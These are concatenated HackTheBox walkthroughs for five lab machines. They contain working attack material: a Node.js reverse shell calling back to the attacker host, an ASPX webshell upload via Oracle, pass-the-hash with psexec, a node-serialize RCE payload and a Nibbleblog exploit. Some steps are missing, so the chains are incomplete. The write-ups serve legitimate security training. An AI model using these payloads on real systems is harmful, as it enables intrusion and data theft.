Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
To learn a new technique/knowledge, solve all machines (As much as possible!!).
This is a walkthrough of a box “Haystack”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.115 -sV-sC
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-04 15:42 EET
Nmap scan report for 10.10.10.115
Host is up (0.047s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
| 256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
|_ 256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
80/tcp open http nginx 1.12.2
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (text/html).
9200/tcp open http nginx 1.12.2
| http-methods:
|_ Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (application/json;charset=UTF-8).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.51 seconds
HTTP enumeration:
Sounds like only one page with heystack image available.
We found base64 encoded data.
Then, decode the message. We get a message with unknown language.
root@kali:~# echo'bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==' | base64-d
la aguja en el pajar es "clave"
Google is always our friend. Translate the message.
la aguja en el pajar es "clave"
->
the needle in the haystack is "key"
Then, go back to elasticsearch.
Elasticsearch is a search engine based on the Lucene library. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents.
To send a query to elasticsearch, we need a parameter “q”.
root@kali:~# curl http://10.10.10.115:9200/_search?q=clave
{"took":136,"timed_out":false,"_shards":{"total":11,"successful":11,"skipped":0,"failed":0},"hits":{"total":2,"max_score":5.9335938,"hits":[{"_index":"quotes","_type":"quote","_id":"45","_score":5.9335938,"_source":{"quote":"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "}},{"_index":"quotes","_type":"quote","_id":"111","_score":5.3459888,"_source":{"quote":"Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}}]}}
To access the “127.0.0.1:5601” from our localhost, we need port forwarding.
We can find “Kibana” which is data visualization UI used with Elasticsearch.
By clicking the “Management” tab, we can figure out that the version of Kibana is “6.4.2”
By quick search, we can find that this version of kibana has a LFI “CVE-2018-17246”
As it’s written, upload followin javascript shell to “/dev/shm”
shell.js:
(function(){varnet=require("net"),cp=require("child_process"),sh=cp.spawn("/bin/sh",[]);varclient=newnet.Socket();client.connect(443,"10.10.14.13",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return/a/;// Prevents the Node.js application form crashing})();
Then, launch a netcat listener and send a get request to access to the “shell.js”.
We can achieve a reverse shell as a user “kibana”.
After a few minutes, finally, we can confirm a new user “firefart” with password “test” was added in “/etc/passwd”.
To switch the user, we can use “su” command.
[security@haystack ~]$ su firefart
Password:
[root@haystack security]# id
uid=0(root)gid=0(root)groups=0(root)context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
To learn a new technique/knowledge, solve all machines (As much as possible!!).
This is a walkthrough of a box “Silo”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.82 -sV-sC
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-06 15:58 EET
Nmap scan report for 10.10.10.82
Host is up (0.047s latency).
Not shown: 65520 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49160/tcp open oracle-tns Oracle TNS listener (requires service name)
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2m19s, deviation: 0s, median: 2m18s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-11-06T14:51:29
|_ start_date: 2019-11-06T14:00:27
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3066.66 seconds
Sounds we have nothing interesting on port 80 HTTP.
Then, try to take a look at Oracle TNS listener.
At first, try to get SIDs.
The Oracle System ID (SID) is used to uniquely identify a particular database on a system. For this reason, one cannot have more than one database with the same SID on a computer system.
msf5 auxiliary(admin/oracle/sid_brute)> use auxiliary/admin/oracle/sid_brute
msf5 auxiliary(admin/oracle/sid_brute)>set rhost 10.10.10.82
rhost => 10.10.10.82
msf5 auxiliary(admin/oracle/sid_brute)> show options
Module options (auxiliary/admin/oracle/sid_brute):
Name Current Setting Required Description
--------------------------------------
RHOSTS 10.10.10.82 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1521 yes The target port (TCP)
SIDFILE /usr/share/metasploit-framework/data/wordlists/sid.txt no The file that contains a list of sids.
SLEEP 1 no Sleep() amount between each request.
msf5 auxiliary(admin/oracle/sid_brute)> run
[*] Running module against 10.10.10.82
[*] 10.10.10.82:1521 - Starting brute force on 10.10.10.82, using sids from /usr/share/metasploit-framework/data/wordlists/sid.txt...
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'XE'[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'PLSExtProc'[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'CLRExtProc'[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID ''[*] 10.10.10.82:1521 - Done with brute force...
[*] Auxiliary module execution completed
Next, try some default credentials.
We can find the list in the Oracle Database Installation Guide.
This time, following credential worked.
scott:tiger
root@kali:/opt/oracle/instantclient_19_3# ./sqlplus SCOTT/tiger@10.10.10.82:1521/XE
SQL*Plus: Release 19.0.0.0.0 - Production on Wed Nov 6 18:24:53 2019
Version 19.3.0.0.0
Copyright (c) 1982, 2019, Oracle. All rights reserved.
ERROR:
ORA-28002: the password will expire within 7 days
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL>
For the Oracle penetration testing, we can use a script “odat.py”.
It is not installed by default, we have to install with “apt-get”
apt-get install odat
Then, upload a aspx webshell which is installed on Kali linux by default.
To upload a file, we need an option “dbmsadvisor”.
root@kali:~# odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba--putFile C:\\inetpub\\wwwroot cmdasp.aspx /usr/share/webshells/aspx/cmdasp.aspx
[1] (10.10.10.82:1521): Put the /usr/share/webshells/aspx/cmdasp.aspx local file in the C:\inetpub\wwwroot path (named cmdasp.aspx) of the 10.10.10.82 server
[+] The /usr/share/webshells/aspx/cmdasp.aspx local file was put in the remote C:\inetpub\wwwroot path (named cmdasp.aspx)
To launch a netcat listener to receive a reverse shell.
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
Now we got a reverse shell.
user.txt is in the directory “Directory: C:\users\Phineas\Desktop”.
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.13] from (UNKNOWN)[10.10.10.82] 49174
cwd
PS C:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> type C:\users\Phineas\Desktop\user.txt
92ede778a1cc8d27cb6623055c331617
3. Getting Root
There is another file in the same directory which name is “Oracle issue.txt” with password.
PS C:\users\Phineas\Desktop> dir
Directory: C:\users\Phineas\Desktop
Mode LastWriteTime Length Name
----------------------------a--- 1/5/2018 10:56 PM 300 Oracle issue.txt
-a--- 1/4/2018 9:41 PM 32 user.txt
PS C:\users\Phineas\Desktop> type"Oracle issue.txt"
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):
Dropbox link provided to vendor (and password under separate cover).
Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0
link password:
?%Hm8646uC$
Then, try to access to the dropbox.
However, above password doesn’t work. To obtain a correct password, we need to use the webshell which we uploaded.
After that, download the file “SILO-20180105-221806.zip”.
£%Hm8646uC$
By unzip, we can get a file which contains memory dump.
We can use “volatility” which is installed by default to do the investigation.
At first, dump the profile of “SILO-20180105-221806.dmp”.
Since we can use Pass the Hash technique for Windows,
we can achieve a SYSTEM shell with metasploit psexec module.
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec)>set smbuser Administrator
smbuser => Administrator
msf5 exploit(windows/smb/psexec)>set smbpass aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7
smbpass => aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7
msf5 exploit(windows/smb/psexec)>set rhost 10.10.10.82
rhost => 10.10.10.82
msf5 exploit(windows/smb/psexec)> run
[*] Started reverse TCP handler on 10.10.14.13:4444
[*] 10.10.10.82:445 - Connecting to the server...
[*] 10.10.10.82:445 - Authenticating to 10.10.10.82:445 as user 'Administrator'...
[*] 10.10.10.82:445 - Selecting PowerShell target
[*] 10.10.10.82:445 - Executing the payload...
[+] 10.10.10.82:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (180291 bytes) to 10.10.10.82
[*] Meterpreter session 1 opened (10.10.14.13:4444 -> 10.10.10.82:49175) at 2019-11-06 19:24:15 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
As always, root.txt is in the directory “C:\Users\Administrator\Desktop”.
meterpreter > shell
Process 1884 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>type C:\users\administrator\desktop\root.txt
type C:\users\administrator\desktop\root.txt
cd39ea0af657a495e33bc59c7836faf6
C:\Windows\system32>
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
To learn a new technique/knowledge, solve all machines (As much as possible!!).
This is a walkthrough of a box “Writeup”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.138 -sV-sC
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-02 15:17 EEST
Nmap scan report for 10.10.10.138
Host is up (0.039s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
| 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_ 256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/writeup/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.42 seconds
Sounds like we can’t use gobuster for this box.
At first, try to look at the web page.
There was nothing here. Next, look at the path which is specified in “http-robots.txt”
We can find a web page which “CMS Made Simple” is used.
In the download page of CMS Made Simple, we can find a link which we can see the content of the package.
In the directory “/trunk/doc”, we can find “CHANGELOG.txt”.
By accessing the “CHANGELOG.txt” on Writeup, we can figure out the version of CMS Made Simple is “2.2.9.1”
root@kali:~# curl http://10.10.10.138/writeup/doc/CHANGELOG.txt
Version 2.2.9.1
-------------------------------
Core - General
- fix to the CmsLayoutStylesheetQuery class
- fix an edge casein the Database\Connection::DbTimeStamp() method
MicroTiny v2.2.4
- Minor fix in error displays.
Phar Installer v1.3.7
- Fix to edge casein step 3 where memory_limit is set to -1
Version 2.2.9 - Blow Me Down
~~~
By accessing via SSH, we can obtain a user shell as “jtk”.
root@kali:~# ssh jkr@10.10.10.138
jkr@10.10.10.138's password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
After that, launch the netcat listener and login to Writeup with SSH as jkr user.
We can get a reverse shell as a root user.
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.30] from (UNKNOWN)[10.10.10.138] 50656
bash: cannot set terminal process group (2460): Inappropriate ioctl for device
bash: no job control in this shell
root@writeup:/# id
id
uid=0(root)gid=0(root)groups=0(root)
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
To learn a new technique/knowledge, solve all machines (As much as possible!!).
This is a walkthrough of a box “Celestial”.
Complation
49th / 131 boxes
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.85 -sV-sC
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 11:46 EEST
Nmap scan report for 10.10.10.85
Host is up (0.039s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2743.74 seconds
We found some parameters in the cookie.
Then, fuzz this node.js webapp with sending some special values in the cookie.
We can find that if we send “+” as special number, we get following syntax error.
This means the value of “num” is not used as strings and is used as an argument of eval() or something.
More precisely, the value of “num” is serialized on the web server.
Then, google like following. We can find this blog Exploiting Node.js deserialization bug for Remote Code Execution
nodejs serialization exploit
According to that blog, to build the payload for RCE, we need following node.js code and run it.
root@kali:~# cat buildRCE.js
var y ={
rce : function(){
require('child_process').exec('uname -a', function(error, stdout, stderr){ console.log(stdout)});},
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));
However, This payload didn’t work for me.
In this article Deserialization Vulnerabilities: Attacking Deserialization in JS, it’s written like During the deserialization process, anything after a special tag \(ND_FUNC\) goes directly to eval function.
This means we don’t need the part “function()” like following.
{"anything_here":"_$$ND_FUNC$$_console.log(1)"}
We can check if the payload correctly by writing following script and executing.
Remove the “function(){\n” and “\n }” part at the bottom
(Don’t forget to put a “" for each single quote!!)
root@kali:~# cat serialize.js
var serialize = require('node-serialize');
var payload ='{"rce":"_$$ND_FUNC$$_require(\'child_process\').exec(\'uname-a\', function(error, stdout, stderr){ console.log(stdout)})"}'
serialize.unserialize(payload);
root@kali:~# node serialize.js
Linux kali 4.19.0-kali5-amd64 #1 SMP Debian 4.19.37-6kali1 (2019-07-22) x86_64 GNU/Linux
By combining previous information, we can obtain the payload.
Also, we need a reverse shell payload which we don’t need to use both single quote and double quote.
Meaning we have to merge the followings.
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.30] from (UNKNOWN)[10.10.10.85] 56418
/bin/sh: 0: can't access tty; job control turned off
$ whoami
sun
user.txt is in the directory “/home/sun/Documents”.
In the syslog, we can confirm that cron is running “/home/sun/Documents/script.py” in every 5 minutes.
$ tail syslog
Oct 5 02:05:46 sun gnome-session[3685]: at Layer.handle [as handle_request] (/home/sun/node_modules/express/lib/router/layer.js:95:5)
Oct 5 02:05:46 sun gnome-session[3685]: at next (/home/sun/node_modules/express/lib/router/route.js:137:13)
Oct 5 02:05:46 sun gnome-session[3685]: at Route.dispatch (/home/sun/node_modules/express/lib/router/route.js:112:3)
Oct 5 02:05:46 sun gnome-session[3685]: at Layer.handle [as handle_request] (/home/sun/node_modules/express/lib/router/layer.js:95:5)
Oct 5 02:05:46 sun gnome-session[3685]: at /home/sun/node_modules/express/lib/router/index.js:281:22
Oct 5 02:05:46 sun gnome-session[3685]: at Function.process_params (/home/sun/node_modules/express/lib/router/index.js:335:12)
Oct 5 02:05:46 sun gnome-session[3685]: at next (/home/sun/node_modules/express/lib/router/index.js:275:10)
Oct 5 02:05:46 sun gnome-session[3685]: at cookieParser (/home/sun/node_modules/cookie-parser/index.js:70:5)
Oct 5 02:05:46 sun gnome-session[3685]: at Layer.handle [as handle_request] (/home/sun/node_modules/express/lib/router/layer.js:95:5)
Oct 5 02:10:01 sun CRON[8246]: (root) CMD (python /home/sun/Documents/script.py > /home/sun/output.txt;cp /root/script.py /home/sun/Documents/script.py;chown sun:sun /home/sun/Documents/script.py; chattr -i /home/sun/Documents/script.py;touch-d"$(date-R-r /home/sun/Documents/user.txt)" /home/sun/Documents/script.py)
Since we have write permission for “/home/sun/Documents/script.py”, we can take advantage of that.
We can find a short python payload on the Pentestmonkey
Make sure to launch the reverse shell listener.
Now we can achieve a reverse shell as a root user.
root@kali:~# nc -nlvp 8080
listening on [any] 8080 ...
connect to [10.10.14.30] from (UNKNOWN)[10.10.10.85] 48518
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
To learn a new technique/knowledge, solve all machines (As much as possible!!).
This is a walkthrough of a box “Nibbles”.
Complation: 48th / 131 boxes
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.75 -sV-sC
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-29 09:43 EEST
Nmap scan report for 10.10.10.75
Host is up (0.039s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.33 seconds
2. Getting User
We have only one port interesting which is 80 (HTTP) and sounds there is nothing here.
By running curl, we can find an interesting comment on the webpage.
Sounds there is a RCE with metasploit.
However, we need a guessing to figure out what is the credential.
This time, the username is same as default and password is the server name.
admin:nibbles
Then, try to execute RCE with following procedure.
msf5 > search nibble
Matching Modules
================# Name Disclosure Date Rank Check Description
- ---------------------------------------
0 exploit/multi/http/nibbleblog_file_upload 2015-09-01 excellent Yes Nibbleblog File Upload Vulnerability
msf5 > use exploit/multi/http/nibbleblog_file_upload
msf5 exploit(multi/http/nibbleblog_file_upload)>set rhost 10.10.10.75
rhost => 10.10.10.75
msf5 exploit(multi/http/nibbleblog_file_upload)>set username admin
username => admin
msf5 exploit(multi/http/nibbleblog_file_upload)>set password nibbles
password => nibbles
msf5 exploit(multi/http/nibbleblog_file_upload)>set targeturi /nibbleblog
targeturi => /nibbleblog
msf5 exploit(multi/http/nibbleblog_file_upload)> run
[*] Started reverse TCP handler on 10.10.14.30:4444
[*] Sending stage (38247 bytes) to 10.10.10.75
[*] Meterpreter session 1 opened (10.10.14.30:4444 -> 10.10.10.75:37036) at 2019-09-29 11:25:40 +0300
[+] Deleted image.php
meterpreter > getuid
Server username: nibbler (1001)
Now we got a meterpreter shell.
user.txt is in the directory “/home/nibbler”.
Currently, we have a meterpreter shell.
To do more enumeration, obtain a full shell like following.
meterpreter > shell
Process 1716 created.
Channel 1 created.
which python
which python3
/usr/bin/python3
python3 -c'import pty;pty.spawn("/bin/bash")'
nibbler@Nibbles:/home/nibbler$
By the command “sudo -l”, we can find that nibbler can run “/home/nibbler/personal/stuff/monitor.sh” as sudo with no password.
nibbler@Nibbles:/home/nibbler$ sudo-lsudo-lsudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
Then, create the file “/home/nibbler/personal/stuff/monitor.sh” with content to spawn root shell.
Finally, execute the “monitor.sh”. It takes time a bit but we can ahieve a root shell.
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh
sudo ./monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
sudo: unable to resolve host Nibbles: Connection timed out
root@Nibbles:/home/nibbler/personal/stuff# id
id
uid=0(root)gid=0(root)groups=0(root)